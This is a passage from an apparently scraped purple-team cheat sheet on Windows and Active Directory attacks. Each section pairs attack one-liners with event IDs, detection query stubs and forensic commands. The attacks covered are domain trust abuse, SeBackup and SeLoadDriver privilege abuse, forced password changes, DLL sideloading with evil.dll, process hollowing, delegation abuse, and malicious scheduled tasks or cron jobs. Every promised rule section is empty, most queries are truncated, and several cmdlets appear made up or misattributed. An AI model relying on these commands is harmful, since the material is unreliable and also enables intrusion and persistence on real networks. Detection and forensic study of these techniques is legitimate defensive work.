Captures network traffic for analysis.
Full Raw KQL/EQL Rules for Detecting GenericWrite Usage
KQL Rule: Unusual Directory Service Object Modifications
EQL Rule: Anomalous ACL Changes
KQL Rule: Suspicious Group Membership Changes
Purple Team Cheat Sheet: Domain Trust Attack Scenario
Attack Technique and Command
Domain Trust Exploitation
Get-DomainTrustMapping -API
Uses PowerView to enumerate domain trusts.
Domain Trust Exploitation
Get-NetDomainTrust -Domain yourdomain.com
Enumerates domain trusts using PowerSploit.
Detection: Event Codes and KQL/EQL Rules
4769
Kerberos Service Ticket (TGS) was requested
`SecurityEvent
4672
Special Privileges Assigned to New Logon
`SecurityEvent
4624
Successful Account Logon
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL/EQL Rules for Detecting Domain Trust Abuse
KQL Rule: Unusual Kerberos Service Ticket Requests Across Domains
EQL Rule: Anomalous Domain Trust Activity
KQL Rule: Suspicious Cross-Domain Logon Types
Purple Team Cheat Sheet: SEBackup Privilege, SeLoadDriverPrivilege, and ForceChangePassword Abuse
Attack Techniques and Commands
SEBackup Privilege Abuse
Get-SeBackupPrivilege -ComputerName target
Uses PowerSploit to exploit SEBackup privilege on a target computer.
SeLoadDriverPrivilege Module
Invoke-SeLoadDriverPrivilege -ComputerName target -DriverPath path_to_driver
Uses a custom module to load a driver using SeLoadDriverPrivilege.
ForceChangePassword Abuse
Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
Forces a password change for a domain user using PowerView.
Detection: Event Codes and KQL/EQL Rules
4672
Special Privileges Assigned to New Logon
`SecurityEvent
4688
A new process has been created
`SecurityEvent
4728
A member was added to a security-enabled global group
`SecurityEvent
Forensics Commands and Codes
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
tcpdump -i eth0 -w network_traffic.pcap
Captures network traffic for analysis.
Full Raw KQL/EQL Rules for Detecting Malicious Patterns
KQL Rule: Unusual Use of SEBackup Privilege
EQL Rule: Suspicious Driver Loading Activity
KQL Rule: Abnormal Changes to User Passwords
Purple Team Cheat Sheet: DLL Sideloading Attack Scenario
Attack Technique and Command
DLL Sideloading
copy evil.dll C:\Path\To\Legitimate\Application\
Places a malicious DLL in a directory where a legitimate application will load it.
Detection: Event Codes, KQL/EQL, Sysmon, and Wazuh Rules
4688
A new process has been created
`SecurityEvent
where EventID == 4688 and NewProcessName contains 'legitimate_application.exe'`
7
Image loaded (Sysmon)
`Sysmon
where EventID == 7 and ImageLoaded contains 'evil.dll'`
1
Process creation (Sysmon)
`Sysmon
where EventID == 1 and ParentImage contains 'legitimate_application.exe'`
Forensics Commands and Codes
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 dlllist
Lists loaded DLLs in a memory dump.
tcpdump -i eth0 -w network_traffic.pcap
Captures network traffic for analysis.
Full Raw KQL/EQL Rules for Detecting DLL Sideloading
KQL Rule: Suspicious DLL Load Patterns
EQL Rule: Anomalous DLL Loading Activity
Sysmon/Wazuh Rule: Malicious DLL Load Detection
Purple Team Cheat Sheet: Process Hollowing and Process Doppelgänging
Attack Techniques and Commands
Process Hollowing
Invoke-ProcessHollowing -SourcePath "C:\Windows\System32\svchost.exe" -TargetPath "C:\Path\To\Malicious.exe"
Uses a PowerShell script to perform process hollowing.
Process Doppelgänging
Invoke-ProcessDoppelganging -Target "C:\Windows\System32\notepad.exe" -Payload "C:\Path\To\Malicious.exe" -Doppelganger "C:\Windows\System32\svchost.exe"
Executes Process Doppelgänging using a custom tool or script.
Detection: Event Codes, KQL/EQL, Sysmon, and Wazuh Rules
4688
A new process has been created
`SecurityEvent
where EventID == 4688 and NewProcessName contains 'notepad.exe'`
1
Process creation (Sysmon)
`Sysmon
where EventID == 1 and ParentImage contains 'svchost.exe'`
7
Image loaded (Sysmon)
`Sysmon
where EventID == 7 and ImageLoaded contains 'malicious.dll'`
Forensics Commands and Codes
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 pslist
Lists running processes in a memory dump.
tcpdump -i eth0 -w network_traffic.pcap
Captures network traffic for analysis.
Full Raw KQL/EQL Rules for Detecting Process Hollowing and Doppelgänging
KQL Rule: Suspicious Process Creation Patterns
EQL Rule: Anomalous Process Execution
Sysmon/Wazuh Rule: Malicious Image Load Detection
Purple Team Cheat Sheet: Abusing Delegation in Active Directory
Attack Techniques and Commands
Unconstrained Delegation Abuse
Set-ADComputer -Identity "targetComputer" -TrustedForDelegation $true
Configures a computer for unconstrained delegation using PowerShell.
Constrained Delegation Abuse
Set-ADComputer -Identity "targetComputer" -PrincipalsAllowedToDelegateToAccount "attackerAccount"
Sets constrained delegation on a target computer to an attacker's account.
Resource-Based Constrained Delegation Abuse
Add-ADComputerServiceAccount -Identity "targetComputer" -ServiceAccount "attackerAccount"
Abuses resource-based constrained delegation by assigning a service account to the target computer.
Detection: Event Codes, KQL/EQL, Sysmon, and Wazuh Rules
5136
A directory service object was modified
`SecurityEvent
where EventID == 5136 and ObjectClass == 'computer' and AttributeLDAPDisplayName == 'msDS-AllowedToDelegateTo'`
4742
A computer account was changed
`SecurityEvent
where EventID == 4742 and ObjectType == 'computer'`
4672
Special Privileges Assigned to New Logon
`SecurityEvent
where EventID == 4672`
Forensics Commands and Codes
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
tcpdump -i eth0 -w network_traffic.pcap
Captures network traffic for analysis.
Full Raw KQL/EQL Rules for Detecting Delegation Abuse
KQL Rule: Unusual Changes to Computer Objects
EQL Rule: Anomalous Computer Account Modifications
Sysmon/Wazuh Rule: Suspicious Computer Account Changes
Purple Team Cheat Sheet: Scheduling Tasks in Windows and Linux
Attack Techniques and Commands
Windows Task Scheduling
schtasks /create /tn "TaskName" /tr "C:\Path\To\Malicious.exe" /sc daily /st 00:00
Creates a scheduled task in Windows to execute a malicious file.
Linux Cron Job Scheduling
`echo "* * * * * /path/to/malicious.sh"
crontab -`
Detection: Event Codes, KQL/EQL, Sysmon, and Wazuh Rules
4698
A scheduled task was created (Windows)
`SecurityEvent
where EventID == 4698`
1
Process creation (Sysmon)
`Sysmon
where EventID == 1 and CommandLine contains 'schtasks'`
-
Cron job added (Linux)
`Sysmon
where EventID == 1 and CommandLine contains 'crontab'`
Forensics Commands and Codes
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 cmdscan
Scans for command line history in a memory dump.
tcpdump -i eth0 -w network_traffic.pcap
Captures network traffic for analysis.
Full Raw KQL/EQL Rules for Detecting Malicious Task Scheduling
KQL Rule: Suspicious Windows Scheduled Task Creation
EQL Rule: Anomalous Scheduled Task Execution
Sysmon/Wazuh Rule: Malicious Task Scheduling Detection
Last updated